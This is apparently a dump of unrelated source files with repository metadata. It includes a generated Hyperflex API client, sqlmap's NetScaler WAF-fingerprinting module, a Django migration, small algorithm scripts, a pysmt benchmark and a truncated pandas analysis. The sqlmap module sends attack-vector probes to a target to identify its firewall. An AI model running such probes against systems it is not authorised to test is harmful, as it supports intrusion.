:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.hyperflex_sys_config_policies_moid_delete_with_http_info(moid, **kwargs)
else:
(data) = self.hyperflex_sys_config_policies_moid_delete_with_http_info(moid, **kwargs)
return data
def hyperflex_sys_config_policies_moid_delete_with_http_info(self, moid, **kwargs):
"""
Delete an instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_delete_with_http_info(moid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['moid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hyperflex_sys_config_policies_moid_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'moid' is set
if ('moid' not in params) or (params['moid'] is None):
raise ValueError("Missing the required parameter `moid` when calling `hyperflex_sys_config_policies_moid_delete`")
collection_formats = {}
path_params = {}
if 'moid' in params:
path_params['moid'] = params['moid']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/hyperflex/SysConfigPolicies/{moid}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def hyperflex_sys_config_policies_moid_get(self, moid, **kwargs):
"""
        An instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_get(moid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:return: HyperflexSysConfigPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.hyperflex_sys_config_policies_moid_get_with_http_info(moid, **kwargs)
else:
(data) = self.hyperflex_sys_config_policies_moid_get_with_http_info(moid, **kwargs)
return data
def hyperflex_sys_config_policies_moid_get_with_http_info(self, moid, **kwargs):
"""
        An instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_get_with_http_info(moid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:return: HyperflexSysConfigPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['moid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hyperflex_sys_config_policies_moid_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'moid' is set
if ('moid' not in params) or (params['moid'] is None):
raise ValueError("Missing the required parameter `moid` when calling `hyperflex_sys_config_policies_moid_get`")
collection_formats = {}
path_params = {}
if 'moid' in params:
path_params['moid'] = params['moid']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/hyperflex/SysConfigPolicies/{moid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='HyperflexSysConfigPolicy',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def hyperflex_sys_config_policies_moid_patch(self, moid, body, **kwargs):
"""
Update an instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_patch(moid, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:param HyperflexSysConfigPolicy body: hyperflexSysConfigPolicy to update (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.hyperflex_sys_config_policies_moid_patch_with_http_info(moid, body, **kwargs)
else:
(data) = self.hyperflex_sys_config_policies_moid_patch_with_http_info(moid, body, **kwargs)
return data
def hyperflex_sys_config_policies_moid_patch_with_http_info(self, moid, body, **kwargs):
"""
Update an instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_patch_with_http_info(moid, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:param HyperflexSysConfigPolicy body: hyperflexSysConfigPolicy to update (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['moid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hyperflex_sys_config_policies_moid_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'moid' is set
if ('moid' not in params) or (params['moid'] is None):
raise ValueError("Missing the required parameter `moid` when calling `hyperflex_sys_config_policies_moid_patch`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `hyperflex_sys_config_policies_moid_patch`")
collection_formats = {}
path_params = {}
if 'moid' in params:
path_params['moid'] = params['moid']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/hyperflex/SysConfigPolicies/{moid}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def hyperflex_sys_config_policies_moid_post(self, moid, body, **kwargs):
"""
Update an instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_post(moid, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:param HyperflexSysConfigPolicy body: hyperflexSysConfigPolicy to update (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.hyperflex_sys_config_policies_moid_post_with_http_info(moid, body, **kwargs)
else:
(data) = self.hyperflex_sys_config_policies_moid_post_with_http_info(moid, body, **kwargs)
return data
def hyperflex_sys_config_policies_moid_post_with_http_info(self, moid, body, **kwargs):
"""
Update an instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_post_with_http_info(moid, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:param HyperflexSysConfigPolicy body: hyperflexSysConfigPolicy to update (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['moid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hyperflex_sys_config_policies_moid_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'moid' is set
if ('moid' not in params) or (params['moid'] is None):
raise ValueError("Missing the required parameter `moid` when calling `hyperflex_sys_config_policies_moid_post`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `hyperflex_sys_config_policies_moid_post`")
collection_formats = {}
path_params = {}
if 'moid' in params:
path_params['moid'] = params['moid']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/hyperflex/SysConfigPolicies/{moid}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def hyperflex_sys_config_policies_post(self, body, **kwargs):
"""
Create a hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_post(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param HyperflexSysConfigPolicy body: hyperflexSysConfigPolicy to add (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.hyperflex_sys_config_policies_post_with_http_info(body, **kwargs)
else:
(data) = self.hyperflex_sys_config_policies_post_with_http_info(body, **kwargs)
return data
def hyperflex_sys_config_policies_post_with_http_info(self, body, **kwargs):
"""
Create a hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_post_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param HyperflexSysConfigPolicy body: hyperflexSysConfigPolicy to add (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hyperflex_sys_config_policies_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `hyperflex_sys_config_policies_post`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/hyperflex/SysConfigPolicies', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
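    # Usage sketch (ours, not from the generated file; the client class name is
    # assumed from the generator's naming conventions, and only query options
    # documented in the docstrings above are used):
    #
    #   api = HyperflexSysConfigPoliciesApi()
    #   page = api.hyperflex_sys_config_policies_get(
    #       filter="Name eq 'default'", top=10, orderby="Name")
    #   api.hyperflex_sys_config_policies_post(body=new_policy)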
| [
"“[email protected]”"
] | |
5afe09e31c7ddd461bd0ca9ead432738d103c647 | 148072ce210ca4754ea4a37d83057e2cf2fdc5a1 | /src/core/w3af/w3af/plugins/attack/db/sqlmap/waf/netscaler.py | 04b6d4eca5614726a9e6be0a151109dfc48cf07b | [] | no_license | ycc1746582381/webfuzzer | 8d42fceb55c8682d6c18416b8e7b23f5e430c45f | 0d9aa35c3218dc58f81c429cae0196e4c8b7d51b | refs/heads/master | 2021-06-14T18:46:59.470232 | 2017-03-14T08:49:27 | 2017-03-14T08:49:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 812 | py | #!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import HTTP_HEADER
from lib.core.settings import WAF_ATTACK_VECTORS
__product__ = "NetScaler (Citrix Systems)"
def detect(get_page):
retval = False
for vector in WAF_ATTACK_VECTORS:
page, headers, code = get_page(get=vector)
retval = re.search(r"\Aclose", headers.get("Cneonction", "") or headers.get("nnCoection", ""), re.I) is not None
retval = re.search(r"\A(ns_af=|citrix_ns_id|NSC_)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
retval |= re.search(r"\ANS-CACHE", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None
if retval:
break
return retval
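# Self-test sketch (ours, not part of sqlmap): a stubbed get_page whose
# response sets an NSC_ cookie should be flagged as NetScaler.
#
#   def fake_get_page(get=None):
#       return "", {"Set-Cookie": "NSC_abcd=1"}, 200
#   assert detect(fake_get_page)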
| [
"[email protected]"
] | |
c62bf5e407c19bc1d3059d7e8ee9abbaba6d7100 | eb74806869a4340a6d8a2623bbe72bd4e64dcde8 | /apps/rss_feeds/migrations/0006_feed_fs_size_bytes.py | cebc86363ae3a0e11564538d0d6f2f78ab934930 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | sictiru/NewsBlur | a0874a1044926d2268ba07a928e62fce5c9a8310 | 1ab88e4cc34775d00a1ac90ee08bc2498577e773 | refs/heads/sictiru | 2023-08-19T20:24:20.638019 | 2023-08-15T03:52:09 | 2023-08-15T03:52:09 | 250,445,213 | 1 | 0 | MIT | 2023-03-06T15:34:38 | 2020-03-27T05:05:44 | Objective-C | UTF-8 | Python | false | false | 409 | py | # Generated by Django 3.1.10 on 2022-05-11 17:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rss_feeds', '0005_feed_archive_subscribers'),
]
operations = [
migrations.AddField(
model_name='feed',
name='fs_size_bytes',
field=models.IntegerField(blank=True, null=True),
),
]
| [
"[email protected]"
] | |
3b30a770bc9971f15e4f4a4cd43afbcdce5c6da2 | cc9cf69b1534dc0d9530b4ff485084162a404e34 | /leetcode/pass/leetcode_90.py | 74fc6a05142615a6ecb6b64f80b6893234b2b510 | [] | no_license | NASA2333/study | 99a58b2c9979201e9a4fae0c797391a538de6f45 | ba63bc18f3c788090e43406315497329b00ec0a5 | refs/heads/master | 2021-05-03T22:26:52.541760 | 2018-02-07T02:24:55 | 2018-02-07T02:24:55 | 104,988,265 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | '''
Given a collection of integers that might contain duplicates, nums, return all possible subsets (the power set).
Note: The solution set must not contain duplicate subsets.
For example,
If nums = [1,2,2], a solution is:
[
[2],
[1],
[1,2,2],
[2,2],
[1,2],
[]
]
'''
from itertools import permutations
def subsetsWithDup(s):
    l = []
    # collect permutations of every length 0..len(s); duplicates are pruned below
    for i in range(len(s)+1):
        l.append(list(permutations(s,i)))
    for i in l[1:]:
        l[0].extend(i)
    # sort each tuple so duplicate subsets become identical lists
    l2 = [sorted(list(i)) for i in l[0]]
    # mark all but the last occurrence of each subset, then drop the marks
    for i in range(len(l2)):
        if l2[i] in l2[i+1:]:
            l2[i] = "*"
    return [i for i in l2 if i != '*']
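# Alternative sketch (ours, not part of the original solution): combinations
# on the sorted input avoids generating duplicate orderings in the first place.
from itertools import combinations
def subsets_with_dup(nums):
    seen = set()
    for r in range(len(nums) + 1):
        seen.update(combinations(sorted(nums), r))
    return [list(t) for t in sorted(seen)]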
print(subsetsWithDup([1,2,2])) | [
"[email protected]"
] | |
8261febe86d08207fffb746dc4ea9b8bb4edf2f7 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/128/usersdata/195/33234/submittedfiles/al6.py | a43d19a9835509d9bcff514428b8a373c0912704 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 211 | py | # -*- coding: utf-8 -*-
n=int(input('enter n:'))
contador=0
i=2
# count proper divisors in [2, n-1]; the original bound (i<=n) also counted
# n itself, so every n >= 2 was wrongly reported as composite
while i<n:
    if n%i==0:
        contador=contador+1
        print(i)
    i=i+1
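# Sketch of a faster primality check (our addition, not called by the script):
# trial division only up to sqrt(n); math.isqrt assumes Python 3.8+.
import math
def is_prime(num):
    if num < 2:
        return False
    for d in range(2, math.isqrt(num) + 1):
        if num % d == 0:
            return False
    return True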
if contador==0:
    print('PRIME')
else:
    print('NOT PRIME') | [
"[email protected]"
] | |
a07fae45caf888b5a1f8594235788961f53f595f | 17f527d6936397270183a35d7097e0a99de16cb5 | /AtCoder/ABC/yomikomi.py | d7eac4e0bf82827b1dc0460a58ae586376914767 | [] | no_license | ryosuke071111/algorithms | e942f043d08c7c7e2c926ed332ee2b8c44bdf0c5 | 867764450cc0f2a709fa2f743d9a0d95001e9296 | refs/heads/master | 2020-05-14T17:14:39.314064 | 2019-04-17T12:58:12 | 2019-04-17T12:58:12 | 181,888,623 | 11 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | with open('goi.txt') as f:
a=f.readlines()
count=0
for i in a:
if "・" in i:
count+=1
print(count)
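# Equivalent one-liner (sketch): count = sum(1 for line in a if "・" in line)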
| [
"[email protected]"
] | |
a7331b3ee43605f606716e225b6f3a8427eb2df6 | 4ae7cdc9292009398a292bdf6bee61428559fdfd | /SourceCodeTools/mltools/torch/__init__.py | 3cf41a14372e44768224cab38988ebb371ea39dc | [] | no_license | VitalyRomanov/method-embedding | 52a4e6e7bf726b4db0872902a0eaf1d8cb82b4a8 | 1c8f0fc04eb1f495555272d9747fd2fea68525e1 | refs/heads/master | 2023-08-31T17:39:04.051912 | 2023-01-08T05:02:52 | 2023-01-08T05:02:52 | 219,153,628 | 5 | 7 | null | 2023-07-22T20:27:20 | 2019-11-02T12:54:12 | Python | UTF-8 | Python | false | false | 308 | py | import torch
def compute_accuracy(pred_, true_):
return torch.sum(pred_ == true_).item() / len(true_)
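# e.g. compute_accuracy(torch.tensor([1, 0, 1]), torch.tensor([1, 1, 1])) -> 2/3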
def to_numpy(tensor):
return tensor.cpu().detach().numpy()
def get_length_mask(target, lens):
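    # e.g. target.size(1) == 5 and lens == tensor([2, 4]) gives
    # [[True, True, False, False, False],
    #  [True, True, True,  True,  False]]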
mask = torch.arange(target.size(1)).to(target.device)[None, :] < lens[:, None]
return mask | [
"[email protected]"
] | |
759b4b822b6a931f35052cc8ae753ec5e73d26ef | fab14fae2b494068aa793901d76464afb965df7e | /benchmarks/f3_wrong_hints/scaling_nonlinear_software/3-19_35.py | 57bc6dce8fac1bc637a307a76bce16e0d73a5015 | [
"MIT"
] | permissive | teodorov/F3 | 673f6f9ccc25acdfdecbfc180f439253474ba250 | c863215c318d7d5f258eb9be38c6962cf6863b52 | refs/heads/master | 2023-08-04T17:37:38.771863 | 2021-09-16T07:38:28 | 2021-09-16T07:38:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,903 | py | from typing import FrozenSet, Tuple
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
symbols = frozenset([pc, x, y, z])
n_locs = 5
int_bound = n_locs
pcs = []
x_pcs = []
ints = [mgr.Int(i) for i in range(int_bound)]
for l in range(n_locs):
n = ints[l]
pcs.append(mgr.Equals(pc, n))
x_pcs.append(mgr.Equals(x_pc, n))
m_1 = mgr.Int(-1)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
# initial location.
init = pcs[0]
# control flow graph.
cfg = mgr.And(
# pc = -1 : -1,
mgr.Implies(pcend, x_pcend),
# pc = 0 & !(y >= 1) : -1,
mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend),
# pc = 0 & y >= 1 : 1,
mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]),
# pc = 1 & !(z >= 1) : -1,
mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend),
# pc = 1 & z >= 1 : 2,
mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]),
# pc = 2 & !(x >= 0) : -1,
mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend),
# pc = 2 & x >= 0 : 3,
mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]),
# pc = 3 : 4,
mgr.Implies(pcs[3], x_pcs[4]),
# pc = 4 : 2,
mgr.Implies(pcs[4], x_pcs[2]))
# transition labels.
labels = mgr.And(
# (pc = -1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcend, x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = 1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcs[1]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = 2) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = 3) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcs[3]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 3 & pc' = 4) -> (x' = y*z - 1 & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[3], x_pcs[4]),
mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])),
mgr.Equals(x_y, y), mgr.Equals(x_z, z))),
# (pc = 4 & pc' = 2) -> (x' = x & y' = y+1 & z' = z),
mgr.Implies(
mgr.And(pcs[4], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])),
mgr.Equals(x_z, z))))
# transition relation.
trans = mgr.And(cfg, labels)
# fairness.
fairness = mgr.Not(pcend)
return symbols, init, trans, fairness
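# For reference (sketch), the encoding above corresponds to the loop program:
#   if y >= 1 and z >= 1:      # pc 0, pc 1
#       while x >= 0:          # pc 2
#           x = y*z - 1        # pc 3
#           y = y + 1          # pc 4
# and the fairness constraint selects runs that never reach the exit pc = -1.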
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
symbs = frozenset([pc, x, y, z])
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
res = []
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_3 = mgr.Int(3)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(2, mgr.Equals(x_x, mgr.Plus(x, y)))
loc2 = Location(env, mgr.GT(x, i_3))
loc2.set_progress(2, mgr.Equals(x_x, x))
h_x = Hint("h_x4", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_0))
loc0.set_progress(1, mgr.Equals(x_z, z))
loc1 = Location(env, mgr.GE(z, i_0))
loc1.set_progress(0, mgr.Equals(x_z, mgr.Plus(z, i_3)))
h_z = Hint("h_z4", env, frozenset([z]), symbs)
h_z.set_locs([loc0, loc1])
res.append(h_z)
loc0 = Location(env, mgr.Equals(pc, i_2))
loc0.set_progress(1, mgr.GT(x_pc, i_2))
loc1 = Location(env, mgr.GE(pc, i_3))
loc1.set_progress(2, mgr.GE(x_pc, i_3))
loc2 = Location(env, mgr.GE(pc, i_3))
loc2.set_progress(0, mgr.Equals(x_pc, i_2))
h_pc = Hint("h_pc4", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1, loc2])
res.append(h_pc)
return frozenset(res)
| [
"[email protected]"
] | |
0c430c6aecd9750cc42ba607375c8993c00e350c | 0b420532815a3841b74335e1e6ab9f3d533225c3 | /day_night.py | a9501b87541c63bc5ae6e47f5b599ce2137cbdd2 | [] | no_license | akuhnregnier/npower | 3d7ec12e2e21a6e23db96714391986d372e0e6e0 | bf3d842cde9b2e311cd415a8da7786ed36909645 | refs/heads/master | 2021-06-11T21:23:55.221317 | 2016-11-17T16:32:06 | 2016-11-17T16:32:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,808 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 03 17:08:37 2016
@author: ahk114
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#import seaborn as sns
import cPickle as pickle
import os
from numpy.fft import fft
from numpy.fft import fftfreq
import scipy.optimize as opt
import copy
plt.close('all')
pd.options.display.expand_frame_repr = False
pd.options.display.max_columns = 15
source = 'round_1.xlsx'
picklefile = 'round1.pickle'
if not os.path.isfile(picklefile):
df = pd.read_excel(source)
with open(picklefile,'wb') as f:
pickle.dump(df,f,protocol=2)
else:
with open(picklefile,'rb') as f:
df = pickle.load(f)
print "Rows, columns:", df.shape
temps = df['Temperature']
days = []
nights = []
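# half-hourly data: 48 samples/day; slots 0-11 and 36-47 (roughly 00:00-06:00
# and 18:00-24:00) go to night and slots 12-35 to day, i.e. 24 samples of
# each per day, which is why the averages below run over blocks of 24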
for i,temp in enumerate(temps):
print "i",i
if i%48<12 or i%48>=36:
nights.append(temp)
else:
days.append(temp)
day_avg = []
night_avg = []
for i in range(0,len(days),24):
print "i2"
day_avg.append(np.mean(days[i:i+24]))
for i in range(0,len(nights),24):
print "i3",i
night_avg.append(np.mean(nights[i:i+24]))
dnight = []
dday = []
for i,demand in enumerate(df['Demand'].loc[df['Demand'] != '?? FC1 ??']):
print "i",i
if i%48<12 or i%48>=36:
dnight.append(demand)
else:
dday.append(demand)
demand_day_avg = []
demand_night_avg = []
